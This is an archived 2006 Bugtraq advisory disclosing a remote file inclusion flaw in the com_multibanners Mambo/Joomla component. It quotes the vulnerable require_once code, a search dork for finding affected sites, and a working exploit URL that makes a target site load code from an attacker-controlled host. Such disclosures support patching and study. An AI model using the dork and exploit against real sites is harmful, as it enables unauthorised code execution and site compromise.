| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060720165328.1005.qmail@securityfocus.com>
Date: 20 Jul 2006 16:53:28 -0000
From: mail@...e-spy.net
To: bugtraq@...urityfocus.com
Subject: Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#############################SolpotCrew Community################################
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
#################################################################################
#
#
# Bug Found By :Blue|Spy
#
# contact: mail@...e-spy.net
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
################################################################################
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
code from extadminmenus.class.php
if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}
Dork:
inurl:com_multibanners
exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
Powered by blists - more mailing lists